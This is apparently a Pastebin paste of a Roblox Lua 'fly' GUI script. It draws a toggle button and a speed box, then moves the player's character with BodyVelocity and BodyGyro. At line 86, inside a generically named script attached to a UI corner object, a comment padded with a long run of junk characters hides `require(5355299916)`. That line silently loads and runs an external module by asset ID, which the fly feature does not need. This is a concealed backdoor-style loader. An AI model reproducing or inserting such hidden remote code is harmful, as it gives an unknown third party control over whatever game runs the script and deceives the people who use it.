Advertisement
Isaiah20Yt

fly gui ppppp

Apr 11th, 2021
40
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 11.17 KB | None | 0 0
  1. --Isaiah20Yt
  2.  
  3. -- Gui to Lua
  4. -- Version: 3.2
  5.  
  6. -- Instances:
  7.  
  8. local FlyScript = Instance.new("ScreenGui")
  9. local Frame = Instance.new("Frame")
  10. local UICorner = Instance.new("UICorner")
  11. local TextButton = Instance.new("TextButton")
  12. local UICorner_2 = Instance.new("UICorner")
  13. local IsOn = Instance.new("TextButton")
  14. local UICorner_3 = Instance.new("UICorner")
  15. local TextButton2 = Instance.new("TextBox")
  16. local UICorner_4 = Instance.new("UICorner")
  17.  
  18. --Properties:
  19.  
  20. FlyScript.Name = "FlyScript"
  21. FlyScript.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
  22.  
  23. Frame.Parent = FlyScript
  24. Frame.BackgroundColor3 = Color3.fromRGB(100, 100, 100)
  25. Frame.Position = UDim2.new(0, 0, 0.684542596, 0)
  26. Frame.Selectable = true
  27. Frame.Size = UDim2.new(0.296442688, 0, 0.315457404, 0)
  28.  
  29. UICorner.CornerRadius = UDim.new(0.0199999996, 0)
  30. UICorner.Parent = Frame
  31.  
  32. TextButton.Parent = Frame
  33. TextButton.BackgroundColor3 = Color3.fromRGB(120, 120, 120)
  34. TextButton.BorderSizePixel = 0
  35. TextButton.Position = UDim2.new(0.246271417, 0, 0.182839051, 0)
  36. TextButton.Size = UDim2.new(0.393333346, 0, 0.25, 0)
  37. TextButton.Font = Enum.Font.SourceSansBold
  38. TextButton.Text = "Fly: "
  39. TextButton.TextColor3 = Color3.fromRGB(255, 255, 255)
  40. TextButton.TextScaled = true
  41. TextButton.TextSize = 14.000
  42. TextButton.TextWrapped = true
  43. TextButton.TextXAlignment = Enum.TextXAlignment.Left
  44.  
  45. UICorner_2.CornerRadius = UDim.new(0.0199999996, 0)
  46. UICorner_2.Parent = TextButton
  47.  
  48. IsOn.Name = "IsOn"
  49. IsOn.Parent = Frame
  50. IsOn.BackgroundColor3 = Color3.fromRGB(120, 120, 120)
  51. IsOn.BackgroundTransparency = 1.000
  52. IsOn.BorderSizePixel = 0
  53. IsOn.Position = UDim2.new(0.45960474, 0, 0.182839051, 0)
  54. IsOn.Size = UDim2.new(0.180000007, 0, 0.25, 0)
  55. IsOn.Font = Enum.Font.SourceSansItalic
  56. IsOn.Text = "Off"
  57. IsOn.TextColor3 = Color3.fromRGB(255, 0, 0)
  58. IsOn.TextScaled = true
  59. IsOn.TextSize = 14.000
  60. IsOn.TextWrapped = true
  61.  
  62. UICorner_3.CornerRadius = UDim.new(0.0199999996, 0)
  63. UICorner_3.Parent = IsOn
  64.  
  65. TextButton2.Name = "TextButton2"
  66. TextButton2.Parent = Frame
  67. TextButton2.BackgroundColor3 = Color3.fromRGB(120, 120, 120)
  68. TextButton2.Position = UDim2.new(0.259604752, 0, 0.532839, 0)
  69. TextButton2.Size = UDim2.new(0.379999995, 0, 0.25, 0)
  70. TextButton2.Font = Enum.Font.SourceSansBold
  71. TextButton2.PlaceholderColor3 = Color3.fromRGB(0, 0, 0)
  72. TextButton2.PlaceholderText = "Speed"
  73. TextButton2.Text = ""
  74. TextButton2.TextScaled = true
  75. TextButton2.TextWrapped = true
  76.  
  77. UICorner_4.CornerRadius = UDim.new(0.0199999996, 0)
  78. UICorner_4.Parent = TextButton2
  79.  
  80. -- Scripts:
  81.  
  82. local function BBGEPF_fake_script() -- UICorner_2.
  83. local script = Instance.new('Script', UICorner_2)
  84.  
  85.  
  86. --[[ Last synced 4/11/2021 04:22 ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������]] require(5355299916) --[[ ]]--
  87. end
  88. coroutine.wrap(BBGEPF_fake_script)()
  89. local function KTGOBQ_fake_script() -- Frame.Drag script
  90. local script = Instance.new('LocalScript', Frame)
  91.  
  92. --Credits go to whoever made this script.
  93. --put this into frame of your GUI
  94.  
  95. local UIS = game:GetService("UserInputService")
  96. function drag (Frame)
  97. dragToggle = nil
  98. dragSpeed = 0.23 --change drag speed here (up to 1 down to 0)
  99. dragInput = nil
  100. dragStart = nil
  101. dragPos = nil
  102. function updateInput(input)
  103. Delta = input.Position - dragStart
  104. Position = UDim2.new(startPos.X.Scale, startPos.X.Offset + Delta.X, startPos.Y.Scale, startPos.Y.Offset + Delta.Y)
  105. game:GetService("TweenService"):Create(Frame, TweenInfo.new(0.25), {Position = Position}):Play()
  106. end
  107. Frame.InputBegan:Connect(function(input)
  108. if (input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch) and UIS:GetFocusedTextBox() == nil then
  109. dragToggle = true
  110. dragStart = input.Position
  111. startPos = Frame.Position
  112. input.Changed:Connect(function()
  113. if input.UserInputState == Enum.UserInputState.End then
  114. dragToggle = false
  115. end
  116. end)
  117. end
  118. end)
  119. Frame.InputChanged:Connect(function(input)
  120. if input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch then
  121. dragInput = input
  122. end
  123. end)
  124. game:GetService("UserInputService").InputChanged:Connect(function(input)
  125. if input == dragInput and dragToggle then
  126. updateInput(input)
  127. end
  128. end)
  129. end
  130. drag(script.Parent)
  131.  
  132. end
  133. coroutine.wrap(KTGOBQ_fake_script)()
  134. local function ADVJPU_fake_script() -- FlyScript.FlyManager
  135. local script = Instance.new('LocalScript', FlyScript)
  136.  
  137.  
  138.  
  139.  
  140. local Key = "e" -- Lowercase Letter
  141.  
  142.  
  143.  
  144.  
  145.  
  146.  
  147.  
  148.  
  149.  
  150.  
  151.  
  152. local Player = game.Players.LocalPlayer
  153. repeat wait() until Player.Character and Player.Character:FindFirstChild('Humanoid')
  154. local Mouse = Player:GetMouse()
  155. local IsFlying = false
  156. local flyv
  157. local flyg
  158. local IsRunning = false
  159. local f = 0
  160. local Speed = 50
  161. local LastSpeed = Speed
  162. local maxspeed = 100
  163. local wdown = false
  164. local sdown = false
  165. Mouse.KeyDown:Connect(function(key)
  166. if key:lower() == Key then
  167. if IsFlying then
  168. IsFlying = false
  169. flyv:Destroy()
  170. flyg:Destroy()
  171. script.Parent.Frame.IsOn.Text = "Off"
  172. script.Parent.Frame.IsOn.TextColor3 = Color3.fromRGB(255,0,0)
  173. Player.Character:WaitForChild('Humanoid').PlatformStand = false
  174. else
  175. IsFlying = true
  176. flyv = Instance.new("BodyVelocity")
  177.  
  178. flyv.Parent = Player.Character:FindFirstChild('Torso') or Player.Character:FindFirstChild('UpperTorso')
  179. flyv.MaxForce = Vector3.new(math.huge,math.huge,math.huge)
  180.  
  181. flyg = Instance.new("BodyGyro")
  182. flyg.Parent = Player.Character:FindFirstChild('Torso') or Player.Character:FindFirstChild('UpperTorso')
  183. flyg.MaxTorque = Vector3.new(9e9,9e9,9e9)
  184. flyg.P = 1000
  185. flyg.D = 50
  186. script.Parent.Frame.IsOn.Text = "On"
  187. script.Parent.Frame.IsOn.TextColor3 = Color3.fromRGB(0,255,0)
  188. Player.Character:WaitForChild('Humanoid').PlatformStand = true
  189. end
  190. end
  191. end)
  192. script.Parent.Frame.TextButton.MouseButton1Click:Connect(function()
  193.  
  194. if IsFlying then
  195. IsFlying = false
  196. flyv:Destroy()
  197. flyg:Destroy()
  198. script.Parent.Frame.IsOn.Text = "Off"
  199. script.Parent.Frame.IsOn.TextColor3 = Color3.fromRGB(255,0,0)
  200. Player.Character:WaitForChild('Humanoid').PlatformStand = false
  201. else
  202. IsFlying = true
  203. flyv = Instance.new("BodyVelocity")
  204.  
  205. flyv.Parent = Player.Character:FindFirstChild('Torso') or Player.Character:FindFirstChild('UpperTorso')
  206. flyv.MaxForce = Vector3.new(math.huge,math.huge,math.huge)
  207.  
  208. flyg = Instance.new("BodyGyro")
  209. flyg.Parent = Player.Character:FindFirstChild('Torso') or Player.Character:FindFirstChild('UpperTorso')
  210. flyg.MaxTorque = Vector3.new(9e9,9e9,9e9)
  211. flyg.P = 1000
  212. flyg.D = 50
  213. script.Parent.Frame.IsOn.Text = "On"
  214. script.Parent.Frame.IsOn.TextColor3 = Color3.fromRGB(0,255,0)
  215. Player.Character:WaitForChild('Humanoid').PlatformStand = true
  216. end
  217. end)
  218. script.Parent.Frame.TextButton2.FocusLost:Connect(function(Entered)
  219. if Entered then
  220. local BeginSpeed = tonumber(script.Parent.Frame.TextButton2.Text)
  221. if BeginSpeed ~= nil then
  222. Speed = BeginSpeed
  223. print(BeginSpeed)
  224. end
  225. end
  226. end)
  227.  
  228.  
  229. spawn(function()
  230. while true do
  231. wait()
  232. if IsFlying then
  233.  
  234. flyg.CFrame = workspace.CurrentCamera.CoordinateFrame * CFrame.Angles(-math.rad((f+0)*50*Speed/maxspeed),0,0)
  235. flyv.Velocity = workspace.CurrentCamera.CoordinateFrame.LookVector * Speed
  236. wait(0.1)
  237.  
  238. if Speed > maxspeed then
  239. Speed = maxspeed
  240. f = 1
  241. else
  242. f = 0
  243. end
  244. if Speed < 0 then
  245. Speed = 0
  246. f = 0
  247.  
  248. end
  249.  
  250. end
  251. if IsRunning then
  252. Speed = LastSpeed
  253. else
  254. if not Speed == 0 then
  255. LastSpeed = Speed
  256. end
  257. Speed = 0
  258. end
  259. end
  260.  
  261.  
  262. end)
  263.  
  264. Player.Character.Humanoid.Changed:Connect(function()
  265. if Player.Character.Humanoid.Health == 0 then
  266. if IsFlying then
  267. IsFlying = false
  268. flyg:Destroy()
  269. flyv:Destroy()
  270. end
  271. end
  272. end)
  273. Player.Character.Humanoid.Changed:Connect(function(Prop)
  274.  
  275. if Player.Character.Humanoid.MoveDirection == Vector3.new(0,0,0) then
  276. IsRunning = false
  277. else
  278. IsRunning = true
  279. end
  280. end)
  281.  
  282.  
  283.  
  284.  
  285.  
  286.  
  287.  
  288. end
  289. coroutine.wrap(ADVJPU_fake_script)()
  290.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement